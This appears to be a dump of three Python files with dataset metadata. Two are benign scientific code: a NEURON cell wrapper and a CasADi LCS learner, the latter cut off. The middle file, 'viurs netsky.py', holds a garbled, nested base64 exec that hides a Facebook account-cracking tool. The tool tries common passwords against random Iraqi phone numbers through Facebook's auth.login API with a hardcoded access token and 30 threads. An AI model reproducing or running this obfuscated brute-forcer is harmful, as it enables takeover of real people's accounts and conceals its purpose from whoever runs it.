| 0
| 0
| 1
| 0.059322
| false
| 0
| 0.042373
| 0.012712
| 0.148305
| 0.008475
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6a2df6d518d69cff798813900fa87ad8315152c
| 1,917
|
py
|
Python
|
examples/single_compartment/cell_wrapper.py
|
pbcanfield/ASCT
|
27dba80c612c844971c545a1af0758272900f8c7
|
[
"MIT"
] | null | null | null |
examples/single_compartment/cell_wrapper.py
|
pbcanfield/ASCT
|
27dba80c612c844971c545a1af0758272900f8c7
|
[
"MIT"
] | 1
|
2021-10-12T21:38:18.000Z
|
2021-10-12T21:38:18.000Z
|
examples/single_compartment/cell_wrapper.py
|
pbcanfield/ASCT
|
27dba80c612c844971c545a1af0758272900f8c7
|
[
"MIT"
] | null | null | null |
from asct.src.Cell import Cell
from neuron import h
import pdb
# This class takes a NEURON HOC file as an input and creates a wrapper
# which can be run by sbi for simulation data.
class CellToOptimize(Cell):
    def __init__(self, template_name="CA3PyramidalCell",
                 template_dir="CA3Cell_Qian/CA3.hoc"):
        """Load a HOC cell template and instantiate it in NEURON.

        template_name -- HOC template to instantiate; default preserves the
                         previously hard-coded CA3 pyramidal cell.
        template_dir  -- path to the HOC file declaring that template.
        """
        # Load the template definitions into the NEURON interpreter.
        h.load_file(template_dir)
        # Look up the template's constructor on the `h` object.
        invoke_cell = getattr(h, template_name)
        # Extract the NEURON cell object itself. Instantiating also
        # registers the cell with the NEURON simulator.
        self.__cell = invoke_cell()
        super(CellToOptimize, self).__init__()

    # REQUIRED FUNCTION
    def set_parameters(self, parameter_list, parameter_values):
        """Set parameter_list[i] = parameter_values[i] on every section of the cell."""
        for sec in self.__cell.all:
            for index, key in enumerate(parameter_list):
                setattr(sec, key, parameter_values[index])

    # REQUIRED FUNCTION
    def get_recording_section(self):
        """Return the recording location: the midpoint of the first soma section."""
        return self.__cell.soma[0](0.5)
class ModelCell(Cell):
    # NOTE(review): duplicates CellToOptimize elsewhere in this file;
    # consider extracting a shared base once callers are audited.
    def __init__(self, template_name="CA3PyramidalCell",
                 template_dir="CA3Cell_Qian/CA3.hoc"):
        """Load a HOC cell template and instantiate it in NEURON.

        template_name -- HOC template to instantiate; default preserves the
                         previously hard-coded CA3 pyramidal cell.
        template_dir  -- path to the HOC file declaring that template.
        """
        # Load the template definitions into the NEURON interpreter.
        h.load_file(template_dir)
        # Look up the template's constructor on the `h` object.
        invoke_cell = getattr(h, template_name)
        # Extract the NEURON cell object itself. Instantiating also
        # registers the cell with the NEURON simulator.
        self.__cell = invoke_cell()
        super(ModelCell, self).__init__()

    # REQUIRED FUNCTION
    def set_parameters(self, parameter_list, parameter_values):
        """Set parameter_list[i] = parameter_values[i] on every section of the cell."""
        for sec in self.__cell.all:
            for index, key in enumerate(parameter_list):
                setattr(sec, key, parameter_values[index])

    # REQUIRED FUNCTION
    def get_recording_section(self):
        """Return the recording location: the midpoint of the first soma section."""
        return self.__cell.soma[0](0.5)
| 35.5
| 102
| 0.66771
| 254
| 1,917
| 4.811024
| 0.295276
| 0.03437
| 0.062193
| 0.02455
| 0.841244
| 0.841244
| 0.841244
| 0.841244
| 0.841244
| 0.841244
| 0
| 0.008421
| 0.256651
| 1,917
| 54
| 103
| 35.5
| 0.849123
| 0.282733
| 0
| 0.774194
| 0
| 0
| 0.052863
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.096774
| 0.064516
| 0.419355
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6e0a2e6eddf4ce4cc78f70a01ed36158c3ff3ea
| 15,628
|
py
|
Python
|
viurs netsky.py
|
covid192/iraquv3
|
797b6935a4c2c079983edf456bd458e802f2e890
|
[
"MIT"
] | null | null | null |
viurs netsky.py
|
covid192/iraquv3
|
797b6935a4c2c079983edf456bd458e802f2e890
|
[
"MIT"
] | null | null | null |
viurs netsky.py
|
covid192/iraquv3
|
797b6935a4c2c079983edf456bd458e802f2e890
|
[
"MIT"
] | 1
|
2021-05-06T03:02:43.000Z
|
2021-05-06T03:02:43.000Z
|
#Coded By Veurs Netsky
#Tele@veuresnetsky
#وقل ربي زدني علما #
import base64
exec(base64.b64decode("#Compile By ARIS STYA CHANNEL
#TIM JANDA
import base64
exec(base64.b64decode("#Compile By ARIS STYA CHANNEL
#TIM JANDA
import base64
exec(base64.b64decode("#Compile By ARIS STYA CHANNEL
#TIM JANDA
import base64
exec(base64.b64decode("IyBDb2RlZCBieSBEdWxMYWggKGZiLm1lL2R1bGFoeikgLS0KIyBSZWNvZGUgQnkgSWtyYS0xOAoKaW1wb3J0IG9zLCByZSwgcmVxdWVzdHMsIGNvbmN1cnJlbnQuZnV0dXJlcwpmcm9tIHJhbmRvbSBpbXBvcnQgcmFuZGludAoKaW1wb3J0IG9zLCBzeXMKTSA9ICdcMDMzWzE7MzNtJwpDID0gJ1wwMzNbMTszMW0nCkQgPSAnXDAzM1sxOzMybScKCmRlZiB3YSgpOgogICAgb3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3d3dy5mYWNlYm9vay5jb20vMTE4NDYyMzU2ODYwMjQ2JykKCgpkZWYgcmVzdGFydCgpOgogICAgbmd1bGFuZyA9IHN5cy5leGVjdXRhYmxlCiAgICBvcy5leGVjbChuZ3VsYW5nLCBuZ3VsYW5nLCAqc3lzLmFyZ3YpCm9zLnN5c3RlbSgnY2xlYXInKSAgICAKcHJpbnQoRCkKCm9zLnN5c3RlbSgnZmlnbGV0ICJTaWRyYWVsZXp6IicpCgpwcmludCggIiIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgClwwMzNbMTs5Nm1bK10gVG9vTCBCeSBTaWRyYSBFTEV6egpcMDMzWzE7OTZtWytdIGlTIFRvb0wgRnJlZSAKXDAzM1sxOzk2bVsrXSBUb29MIENyYWNrIEZhY2Vib29rIElyYXFWMyAKIiIiKQoKcHJpbnQoQykKCnByaW50KCcgICAgICAgICAgIDw9PT09PT09PT09PT09PT09PT09PT09PT4gICAgICAgICAnKQp1c2VyID0gaW5wdXQoJ1wwMzNbMTs5Nm1bK11ceDFiWzE7OTdtVXNlck5hbWUgXHgxYlsxOzk2bT0gJykKaW1wb3J0IGdldHBhc3MKc2FuZGkgPSBpbnB1dCgnXDAzM1sxOzk2bVsrXVx4MWJbMTs5N21QQVNTV09SRCBceDFiWzE7OTZtPSAnKQppZiBzYW5kaSA9PSAnSXJhcXYzJyBhbmQgdXNlciA9PSAnSXJhcXYzJzoKICAgIHByaW50KCAnQW5kYSBUZWxhaCBMb2dpbicpCiAgICBzeXMuZXhpdAplbHNlOgogICAgcHJpbnQoICdMb2dpbiBHQUdBTCwgU2lsYWhrYW4gaHVidW5naSBBRE1JTicpCiAgICB3YSgpCiAgICByZXN0YXJ0KCkKb3Muc3lzdGVtKCdjbGVhcicpCgpsaWIgPSBpbnB1dCgiIiJcMDMzWzkybQogX19fXyAgXyAgICAgXyAgICAgICAgICAgICAgICBfCi8gX19ffChfKSBfX3wgfF8gX18gX18gXyAgX19ffCB8IF9fXyBfX19fX19fXwpcX19fIFx8IHwvIF9gIHwgJ19fLyBfYCB8LyBfIFwgfC8gXyBcXyAgL18gIC8gICAgICBfX18pIHwgfCAoX3wgfCB8IHwgKF98IHwgIF9fLyB8ICBfXy8vIC8gLyAvCnxfX19fL3xffFxfXyxffF98ICBcX18sX3xcX19ffF98XF9fXy9fX18vX19ffAoKXDAzM1sxOzkzbVsrXSBUb29MIEJ5IFNpZHJhIEVMRXp6ClwwMzNbMTs5Nm1bK10gaVMgVG9vTCBGcmVlIApcMDMzWzE7OTVtWytdIFRvb0wgQ3JhY2sgRmFjZWJvb2sgSXJhcVYzIAoKICBcMDMzWzE7OTNtICAgICAgICAgICAgPD09PT09PT09PT09PT09PT09PT09PT09PgpcMDMzWzE7OTJtWzFdIERvd25sb2FkIGxpYiAmIHVwZGF0ZQpcMDMzWzE7OTJtWzJdI
HBhc3MKClwwMzNbMTs5MW1bK10gUGxlYXNlIENob2ljZSA+PlwwMzNbMTs5Mm0gIiIiKQoKaWYgbGliID09ICIxIjoKICAgIG9zLnN5c3RlbSgncGtnIHVwYWR0ZSAmJiBwa2cgdXBncmFkZScpCiAgICBvcy5zeXN0ZW0oJ3BrZyBpbnN0YWxsIGZpc2gnKQogICAgb3Muc3lzdGVtKCdwa2cgaW5zdGFsbCBweXRob24yJykKICAgIG9zLnN5c3RlbSgncGtnIGluc3RhbGwgZmlnbGV0JykKICAgIG9zLnN5c3RlbSgncGtnIGluc3RhbGwgdG9pbGV0JykKICAgIG9zLnN5c3RlbSgnY2xlYXInKQogICAgcGFzcwplbHNlOgogICAgb3Muc3lzdGVtKCdjbGVhcicpCiAgICBwYXNzCm9zLnN5c3RlbSgnY2xlYXInKQpkZWYgYnJ1dGUodXNlciwgcGFzc3MpOgogIHRyeToKICAgIGZvciBwdyBpbiBwYXNzczoKICAgICAgcGFyYW1zPXsKICAgICAgICAnYWNjZXNzX3Rva2VuJzogJzM1MDY4NTUzMTcyOCU3QzYyZjhjZTlmNzRiMTJmODRjMTIzY2MyMzQzN2E0YTMyJywKICAgICAgICAnZm9ybWF0JzogJ0pTT04nLAogICAgICAgICdzZGtfdmVyc2lvbic6ICcyJywKICAgICAgICAnZW1haWwnOiB1c2VyLAogICAgICAgICdsb2NhbGUnOiAnZW5fVVMnLAogICAgICAgICdwYXNzd29yZCc6IHB3LAogICAgICAgICdzZGsnOiAnaW9zJywKICAgICAgICAnZ2VuZXJhdGVfc2Vzc2lvbl9jb29raWVzJzogJzEnLAogICAgICAgICdzaWcnOiAnM2Y1NTVmOTlmYjYxZmNkN2FhMGM0NGY1OGY1MjJlZjYnLAogICAgICB9CiAgICAgIGFwaT0naHR0cHM6Ly9iLWFwaS5mYWNlYm9vay5jb20vbWV0aG9kL2F1dGgubG9naW4nCiAgICAgIHJlc3BvbnNlPXJlcXVlc3RzLmdldChhcGksIHBhcmFtcz1wYXJhbXMpCiAgICAgIGlmIHJlLnNlYXJjaCgnKEVBQUEpXHcrJywgc3RyKHJlc3BvbnNlLnRleHQpKToKICAgICAgICBwcmludCgnICBbTElWRV0gJXMgLT4gJXMgJyUoc3RyKHVzZXIpLCBzdHIocHcpKSkKICAgICAgICBicmVhawogICAgICBlbGlmICd3d3cuZmFjZWJvb2suY29tJyBpbiByZXNwb25zZS5qc29uKClbJ2Vycm9yX21zZyddOgogICAgICAgIHByaW50KCcgIFtDSEVLXSAlcyAtPiAlcyAnJShzdHIodXNlciksIHN0cihwdykpKQogICAgICAgIGJyZWFrCiAgZXhjZXB0OiBwYXNzCgpkZWYgcmFuZG9tX251bWJlcnMoKToKICBkYXRhID0gW10KICBvcy5zeXN0ZW0oJ2NscycgaWYgb3MubmFtZSA9PSAnbnQnIGVsc2UgJ2NsZWFyJykKICBvcy5zeXN0ZW0oJ2NsZWFyJykKICBwcmludChEKQogIG9zLnN5c3RlbSgnZmlnbGV0ICJJUkFRIicpCiAgcHJpbnQoJycnCiBcMzNbMzE7MW1bIFRvb0wgQ3JhY2sgRmFjZWJvb2sgSXJhcVYzICBdCgpcMDMzWzE7OTNtWytdIENob29zZSB0aGUgbnVtYmVyWzVdLCBvayBFeGFtcGxlOgpcMDMzWzE7OTVtWytdIDk2NDc1ClwwMzNbMTs5NW1bK10gOTY0NzcKXDAzM1sxOzk1bVsrXSA5NjQ3OAogICcnJykKICBrb2RlPXN0cihpbnB1dCgnXDMzWzMzOzFtRW50ZXIgdGhlIHN0YXJ0aW5nIG51bWJlcjogJykpCiAgZXhpdCgnXDMzW
zM2OzFtIFRoZSBudW1iZXIgbXVzdCBiZSA1IGRpZ2l0cywgbm8gbGVzcyBhbmQgbm8gbW9yZS4nKSBpZiBsZW4oa29kZSkgPCA1IGVsc2UgJycKICBleGl0KCdcMzNbMzY7MW0gVGhlIG51bWJlciBtdXN0IGJlIDUgZGlnaXRzLCBubyBsZXNzIGFuZCBubyBtb3JlLicpIGlmIGxlbihrb2RlKSA+IDUgZWxzZSAnJwogIG9zLnN5c3RlbSgnY2xlYXInKQogIG9zLnN5c3RlbSgndG9pbGV0IC1mIGJpZyBTaWRyYWVsZXp6IC1GIGdheScpCiAgcHJpbnQoIiIiCiAgXDAzM1sxOzkzbSAgICAgICAgICAgIDw9PT09PT09PT09PT09PT09PT09PT09PT4KICAKICBcMDMzWzE7OTJtWytdIFRvb0wgQnkgU2lkcmEgRUxFenoKICBcMDMzWzE7OTJtWytdIGlTIFRvb0wgRnJlZSAKICBcMDMzWzE7OTJtWytdIFRvb0wgQ3JhY2sgRmFjZWJvb2sgSXJhcVYzCiAgCiAgXDAzM1sxOzkzbSAgICAgICAgICAgIDw9PT09PT09PT09PT09PT09PT09PT09PT4KICAiIiIpCiAgb3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3QubWUvTzFPT0InKQogIGptbD1pbnQoaW5wdXQoJycnCiAgXDMzWzM2OzFtRW50ZXIgdGhlIG51bWJlciA6ICcnJykpCiAgW2RhdGEuYXBwZW5kKHsndXNlcic6IHN0cihlKSwgJ3B3JzpbMTEyMjMzNDQ1NSwxMjM0NTEyMzQ1LDExMjIzMzQ0NTU2NiwxMjM0NTU0MzIxXX0pIGZvciBlIGluIFtzdHIoa29kZSkrJycuam9pbihbJyVzJyUocmFuZGludCgwLDkpKSBmb3IgaSBpbiByYW5nZSgwLDgpXSkgZm9yIGUgaW4gcmFuZ2Uoam1sKV1dCiAgcHJpbnQoIiIiCiAgXDAzM1sxOzkzbSAgICAgICAgICAgICYgJiAmICYgJiAmICYgJiAmICYgJiAmCiAgIiIiKQogIHdpdGggY29uY3VycmVudC5mdXR1cmVzLlRocmVhZFBvb2xFeGVjdXRvcihtYXhfd29ya2Vycz0zMCkgYXMgdGg6CiAgICB7dGguc3VibWl0KGJydXRlLCB1c2VyWyd1c2VyJ10sIHVzZXJbJ3B3J10pOiB1c2VyIGZvciB1c2VyIGluIGRhdGF9CiAgcHJpbnQoJ1xuICBEb25lOiknKQoKZGVmIHJhbmRvbV9lbWFpbCgpOgogIG9zLnN5c3RlbSgnY2xlYXInKQogIG9zLnN5c3RlbSgndG9pbGV0IC1mIGJpZyBUZWxlZ3JhbSAtRiBnYXkgfCBsb2xjYXQnKQogIG9zLnN5c3RlbSgneGRnLW9wZW4gaHR0cHM6Ly90Lm1lL1RUX1JRJykKICBvcy5zeXN0ZW0oJ2NsZWFyJykKICBvcy5zeXN0ZW0oJ3RvaWxldCAtZiBiaWcgWW91VHViZSAtRiBnYXkgfCBsb2xjYXQnKQogIG9zLnN5c3RlbSgneGRnLW9wZW4gaHR0cHM6Ly95b3V0dWJlLmNvbS9jaGFubmVsL1VDekZ2aUZZQ09KSTRJd2hkVk9RVHFJdycpIAoKZGVmIHBpbGloKCk6CiAgcHJpbnQoRCkKCiAgb3Muc3lzdGVtKCdmaWdsZXQgIlNpZHJhZWxlenoiJykKICBwcmludCgiIiIKICAxLiBcMzNbMzM7MW1Ub29MIENyYWNrIEZhY2Vib29rIElyYXFWMyBcMzNbMzc7MW0KICAyLiBcMzNbMzM7MW1Gb2xsb3cgU2lkcmEgRUxFenoKICAiIiIpCiAgb3Muc3lzdGVtKCd4ZGctb3BlbiBodHRwczovL3QubWUvVFRfUlEnKQogIHBpbD1pbnQoaW5wd
XQoJyAgQ2hvb3NlIE51bWJlcjogJykpCiAgaWYgcGlsID09IDE6CiAgICByYW5kb21fbnVtYmVycygpCiAgZWxpZiBwaWwgPT0gMjoKICAgIHJhbmRvbV9lbWFpbCgpCiAgZWxzZToKICAgIGV4aXQoJyAgZ29vZGx1Y2snKQoKcGlsaWgoKSBpZiBfX25hbWVfXyA9PSAnX19tYWluX18nIGVsc2UgZXhpdCgnU29ycnksIHNvbWV0aGluZyB3cm9uZywgcGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4nKQoKCiAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgCgoK"))"))"))"))
| 2,604.666667
| 15,550
| 0.998272
| 16
| 15,628
| 975.0625
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091643
| 0.000832
| 15,628
| 5
| 15,551
| 3,125.6
| 0.907461
| 0.003519
| 0
| 0
| 0
| 0
| 0.997174
| 0.997174
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
5b2b93f3c581679bcf03ef0ffacc8f0f768c756a
| 86,229
|
py
|
Python
|
examples/trifinger/lcs/task_driven.py
|
wanxinjin/manipulation
|
3850c90b9be757163c4c87b47344d085bbb9307d
|
[
"BSD-3-Clause"
] | null | null | null |
examples/trifinger/lcs/task_driven.py
|
wanxinjin/manipulation
|
3850c90b9be757163c4c87b47344d085bbb9307d
|
[
"BSD-3-Clause"
] | null | null | null |
examples/trifinger/lcs/task_driven.py
|
wanxinjin/manipulation
|
3850c90b9be757163c4c87b47344d085bbb9307d
|
[
"BSD-3-Clause"
] | null | null | null |
import casadi
from casadi import *
import matplotlib.pyplot as plt
import numpy as np
import numpy.linalg as la
# class for learning LCS from the hybrid data
class LCS_learner:
    """Differentiable learner for a Linear Complementarity System (LCS).

    Model being fit:
        dynamics:  x_next = A x + B u + C lam
        LCP:       0 <= lam  complementary to  D x + E u + F lam + lcp_offset >= 0

    Any of A, B, C, D, E, G, H, lcp_offset passed as None becomes a symbolic
    decision variable collected into ``self.theta``; values given numerically
    are frozen as constant DM matrices. F is parameterized indirectly as
    stiffness*I + G@G.T + (H - H.T), i.e. a PSD part plus a skew-symmetric
    part (presumably to keep the LCP well-posed — not asserted here).
    """

    def __init__(self, n_state, n_control, n_lam,
                 A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
                 stiffness=0.):
        self.n_lam = n_lam
        self.n_state = n_state
        self.n_control = n_control
        # Symbolic variables for the complementarity variable, state and control.
        self.lam = SX.sym('lam', self.n_lam)
        self.x = SX.sym('x', self.n_state)
        self.u = SX.sym('u', self.n_control)
        # Learnable parameters are accumulated here, one vec() per free matrix.
        self.theta = []
        if A is None:
            self.A = SX.sym('A', self.n_state, self.n_state)
            self.theta += [vec(self.A)]
        else:
            self.A = DM(A)
        if B is None:
            self.B = SX.sym('B', self.n_state, self.n_control)
            self.theta += [vec(self.B)]
        else:
            self.B = DM(B)
        if C is None:
            self.C = SX.sym('C', self.n_state, self.n_lam)
            self.theta += [vec(self.C)]
        else:
            self.C = DM(C)
        if D is None:
            self.D = SX.sym('D', self.n_lam, self.n_state)
            self.theta += [vec(self.D)]
        else:
            self.D = DM(D)
        if E is None:
            self.E = SX.sym('E', self.n_lam, self.n_control)
            self.theta += [vec(self.E)]
        else:
            self.E = DM(E)
        if G is None:
            self.G = SX.sym('G', self.n_lam, self.n_lam)
            self.theta += [vec(self.G)]
        else:
            self.G = DM(G)
        if H is None:
            self.H = SX.sym('H', self.n_lam, self.n_lam)
            self.theta += [vec(self.H)]
        else:
            self.H = DM(H)
        if lcp_offset is None:
            self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
            self.theta += [vec(self.lcp_offset)]
        else:
            self.lcp_offset = DM(lcp_offset)
        # Flatten the parameter list into one symbolic vector.
        self.theta = vcat(self.theta)
        self.n_theta = self.theta.numel()
        # F is built from G and H rather than learned directly (see class docstring).
        self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
        # Accessor functions that map a theta value to each (possibly symbolic) matrix.
        self.F_fn = Function('F_fn', [self.theta], [self.F])
        self.D_fn = Function('D_fn', [self.theta], [self.D])
        self.E_fn = Function('E_fn', [self.theta], [self.E])
        self.G_fn = Function('G_fn', [self.theta], [self.G])
        self.H_fn = Function('H_fn', [self.theta], [self.H])
        self.A_fn = Function('A_fn', [self.theta], [self.A])
        self.B_fn = Function('B_fn', [self.theta], [self.B])
        self.C_fn = Function('C_fn', [self.theta], [self.C])
        self.lcp_offset_fn = Function('lcp_offset_fn', [self.theta], [self.lcp_offset])
        # self.dyn_offset_fn = Function('dyn_offset_fn', [self.theta], [self.dyn_offset])
        # initialize the parameter
        self.val_theta = 0.1 * np.random.randn(self.n_theta)

    def differetiable(self, gamma=1e-3, epsilon=0.5):
        """Build the inner QP, the loss functions, and their derivatives w.r.t. theta.

        NOTE: the method name keeps the original spelling ("differetiable")
        for interface compatibility.

        gamma penalizes the gap between the slack phi and the LCP distance;
        epsilon weights the lcp loss against the dynamics loss.
        """
        # define the dynamics loss
        self.x_next = SX.sym('x_next', self.n_state)
        data = vertcat(self.x, self.u, self.x_next)
        # self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam + self.dyn_offset
        self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
        dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
        # lcp loss: lam'phi plus a quadratic penalty tying phi to the LCP distance
        self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
        self.phi = SX.sym('phi', self.n_lam)
        lcp_loss = dot(self.lam, self.phi) + 1 / gamma * dot(self.phi - self.dist,
                                                             self.phi - self.dist)
        # total loss
        # loss = (1 - epsilon) * dyn_loss + epsilon * lcp_loss
        loss = dyn_loss + lcp_loss / epsilon
        # loss = dot(self.dyn[2:4] - self.x_next[2:4], self.dyn[2:4] - self.x_next[2:4]) + lcp_loss / epsilon
        # loss = (dyn_loss + lcp_loss / epsilon) / (0.5+dot(self.x_next, self.x_next))
        # establish the qp solver over (lam, phi) with (x, u, x_next, theta) as parameters
        lam_phi = vertcat(self.lam, self.phi)
        data_theta = vertcat(self.x, self.u, self.x_next, self.theta)
        quadprog = {'x': vertcat(self.lam, self.phi), 'f': loss, 'p': data_theta}
        opts = {'printLevel': 'none', }
        self.inner_QPSolver = qpsol('inner_QPSolver', 'qpoases', quadprog, opts)
        # compute the jacobian from lam to theta
        self.loss_fn = Function('loss_fn', [data, self.theta, lam_phi], [loss])
        self.dloss_fn = Function('dloss_fn', [data, self.theta, lam_phi], [jacobian(loss, self.theta).T])
        self.dyn_loss_fn = Function('dyn_loss_fn', [data, self.theta, lam_phi], [dyn_loss])
        self.lcp_loss_fn = Function('lcp_loss_fn', [data, self.theta, lam_phi], [lcp_loss])
        # stationarity-style map L = diag(lam_phi) * grad(loss); its implicit
        # differentiation below yields dsol/dtheta
        grad_loss = jacobian(loss, lam_phi).T
        L = diag(lam_phi) @ grad_loss
        self.L_fn = Function('L_fn', [data, self.theta, lam_phi], [L])  # this is just for testing
        # compute the gradient of lam_phi_opt with respect to theta (implicit function theorem)
        dL_dsol = jacobian(L, lam_phi)
        dL_dtheta = jacobian(L, self.theta)
        dsol_dtheta = -inv(dL_dsol) @ dL_dtheta
        self.dsol_dtheta_fn = Function('dsol_dtheta_fn', [data, self.theta, lam_phi], [dsol_dtheta])
        # this is just for testing: total derivative including the solution path
        dloss2 = jacobian(loss, self.theta) + jacobian(loss, lam_phi) @ dsol_dtheta
        self.dloss2_fn = Function('dloss2_fn', [data, self.theta, lam_phi], [dloss2.T])
        # compute the second order derivative (Gauss-Newton-like total Hessian)
        dloss_dtheta = jacobian(loss, self.theta).T
        ddloss = jacobian(dloss_dtheta, self.theta) + jacobian(dloss_dtheta, lam_phi) @ dsol_dtheta
        self.ddloss_fn = Function('ddloss_fn', [data, self.theta, lam_phi], [ddloss])

    def compute_lambda(self, x_batch, u_batch, x_next_batch):
        """Solve the inner QP for each sample; return (lam_phi batch, optimal losses).

        Each *_batch argument is a 2-D array with one sample per row.
        Requires ``differetiable()`` to have been called first.
        """
        # prepare the data: one column per sample, theta tiled across the batch
        batch_size = x_batch.shape[0]
        data_batch = np.hstack((x_batch, u_batch, x_next_batch))
        theta_val_batch = np.tile(self.val_theta, (batch_size, 1))
        data_theta_batch = np.hstack((data_batch, theta_val_batch))
        # compute the lam_phi solution (lbx=0 enforces lam, phi >= 0)
        sol_batch = self.inner_QPSolver(lbx=0.0, p=data_theta_batch.T)
        loss_opt_batch = sol_batch['f'].full().flatten()
        lam_phi_opt_batch = sol_batch['x'].full().T
        return lam_phi_opt_batch, loss_opt_batch

    def gradient_step(self, x_batch, u_batch, x_next_batch, lam_phi_opt_batch, second_order=False):
        """Evaluate batch-mean gradient and losses at the current self.val_theta.

        Returns (dtheta_mean, loss_mean, dyn_loss_mean, lcp_loss_mean, dtheta_hessian)
        where dtheta_hessian is the damped-Newton direction when second_order is
        True, otherwise just a copy of the plain gradient.
        """
        batch_size = x_batch.shape[0]
        data_batch = np.hstack((x_batch, u_batch, x_next_batch))
        theta_val_batch = np.tile(self.val_theta, (batch_size, 1))
        # compute the gradient value (mean over the batch)
        dtheta_batch = self.dloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        dtheta_mean = dtheta_batch.full().mean(axis=1)
        # compute the losses
        loss_batch = self.loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        dyn_loss_batch = self.dyn_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        lcp_loss_batch = self.lcp_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
        loss_mean = loss_batch.full().mean()
        dyn_loss_mean = dyn_loss_batch.full().mean()
        lcp_loss_mean = lcp_loss_batch.full().mean()
        dtheta_hessian = dtheta_mean
        if second_order is True:
            # ddloss_fn stacks per-sample Hessians side by side; slice them apart
            hessian_batch = self.ddloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
            # compute the mean hessian
            hessian_sum = 0
            for i in range(batch_size):
                hessian_i = hessian_batch[:, i * self.n_theta:(i + 1) * self.n_theta]
                hessian_sum += hessian_i
            hessian_mean = hessian_sum / batch_size
            # damp the singular values so the Hessian is safely invertible
            damping_factor = 1
            u, s, vh = np.linalg.svd(hessian_mean)
            s = s + damping_factor
            damped_hessian = u @ np.diag(s) @ vh
            dtheta_hessian = (inv(damped_hessian) @ DM(dtheta_mean)).full().flatten()
        return dtheta_mean, loss_mean, dyn_loss_mean, lcp_loss_mean, dtheta_hessian

    def dyn_prediction(self, x_batch, u_batch):
        """Predict next states by solving the learned LCP for lam, then applying the dynamics.

        Returns (x_next_batch, lam_opt_batch), one row per sample.
        """
        # rebuild the symbolic graph so self.dist/self.dyn exist
        self.differetiable()
        batch_size = x_batch.shape[0]
        theta_val_batch = np.tile(self.val_theta, (batch_size, 1))
        xu_theta_batch = np.hstack((x_batch, u_batch, theta_val_batch))
        # establish the lcp solver: min lam'dist s.t. lam >= 0, dist >= 0
        lcp_loss = dot(self.dist, self.lam)
        xu_theta = vertcat(self.x, self.u, self.theta)
        quadprog = {'x': self.lam, 'f': lcp_loss, 'g': self.dist, 'p': xu_theta}
        opts = {'printLevel': 'none'}
        lcp_Solver = qpsol('lcp_solver', 'qpoases', quadprog, opts)
        self.lcp_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist, dot(self.dist, self.lam)])
        self.lcp_dist_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist])
        # establish the dynamics equation
        dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.theta], [self.dyn])
        # compute the lam_batch
        sol_batch = lcp_Solver(lbx=0., lbg=0., p=xu_theta_batch.T)
        lam_opt_batch = sol_batch['x'].full().T
        # compute the next state batch
        x_next_batch = dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, theta_val_batch.T).full().T
        return x_next_batch, lam_opt_batch
# class for learning LCS from the hybrid data
class LCS_learner_backup:
    """Backup variant of LCS_learner with an externally supplied theta value.

    Differences from LCS_learner: theta is NOT stored on the instance (no
    ``val_theta``); ``compute_lambda``, ``gradient_step`` and
    ``dyn_prediction`` take ``theta_val`` explicitly. The training loss also
    penalizes only state components [2:4] of the dynamics error (indices
    chosen by the original author — presumably task-specific; confirm).

    Model being fit:
        dynamics:  x_next = A x + B u + C lam
        LCP:       0 <= lam  complementary to  D x + E u + F lam + lcp_offset >= 0
    with F = stiffness*I + G@G.T + (H - H.T).
    """

    def __init__(self, n_state, n_control, n_lam,
                 A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
                 stiffness=0.):
        self.n_lam = n_lam
        self.n_state = n_state
        self.n_control = n_control
        # Symbolic variables for the complementarity variable, state and control.
        self.lam = SX.sym('lam', self.n_lam)
        self.x = SX.sym('x', self.n_state)
        self.u = SX.sym('u', self.n_control)
        # Learnable parameters: one vec() per matrix left as None.
        self.theta = []
        if A is None:
            self.A = SX.sym('A', self.n_state, self.n_state)
            self.theta += [vec(self.A)]
        else:
            self.A = DM(A)
        if B is None:
            self.B = SX.sym('B', self.n_state, self.n_control)
